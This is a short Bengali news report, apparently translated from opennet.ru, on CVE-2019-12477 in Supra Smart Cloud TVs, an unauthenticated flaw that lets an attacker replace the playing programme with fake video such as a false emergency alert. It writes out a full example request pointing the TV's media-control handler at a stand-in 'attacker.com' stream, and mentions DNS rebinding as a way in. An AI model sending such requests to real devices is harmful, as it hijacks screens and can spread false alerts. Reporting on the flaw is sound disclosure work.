🥇সুপ্রা স্মার্ট টিভিতে দুর্বলতা যা আপনাকে কাল্পনিক ভিডিও প্রদর্শন করতে দেয়

সুপ্রা স্মার্ট ক্লাউড টিভিতে চিহ্নিত দুর্বলতা (CVE-2019-12477) যা আপনাকে আক্রমণকারীর বিষয়বস্তুর সাথে বর্তমানে দেখা প্রোগ্রাম প্রতিস্থাপন করতে দেয়। একটি উদাহরণ হিসাবে, একটি জরুরী পরিস্থিতি সম্পর্কে একটি কাল্পনিক সতর্কতার আউটপুট প্রদর্শিত হয়।

একটি আক্রমণের জন্য, এটি একটি বিশেষভাবে তৈরি করা নেটওয়ার্ক অনুরোধ পাঠানোর জন্য যথেষ্ট যার প্রমাণীকরণের প্রয়োজন নেই। বিশেষ করে, আপনি ভিডিও প্যারামিটার সহ m3u8 ফাইলের URL উল্লেখ করে “/remote/media_control?action=setUri&uri=” হ্যান্ডলার অ্যাক্সেস করতে পারেন, উদাহরণস্বরূপ “http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8।"

বেশিরভাগ ক্ষেত্রে, টিভির আইপি ঠিকানায় অ্যাক্সেস অভ্যন্তরীণ নেটওয়ার্কের মধ্যে সীমাবদ্ধ, কিন্তু যেহেতু অনুরোধটি HTTP-এর মাধ্যমে পাঠানো হয়, ব্যবহারকারী যখন একটি বিশেষভাবে ডিজাইন করা বহিরাগত পৃষ্ঠা খোলে তখন অভ্যন্তরীণ সংস্থানগুলি অ্যাক্সেস করার পদ্ধতিগুলি ব্যবহার করা সম্ভব (উদাহরণস্বরূপ, নীচে একটি ছবির অনুরোধের ছদ্মবেশে বা ব্যবহার করে DNS রিবাইন্ডিং).

উত্স: opennet.ru

সুপ্রা স্মার্ট টিভিতে দুর্বলতা যা আপনাকে কাল্পনিক ভিডিও প্রদর্শন করতে দেয়

একটি মন্তব্য জুড়ুন উত্তর বাতিল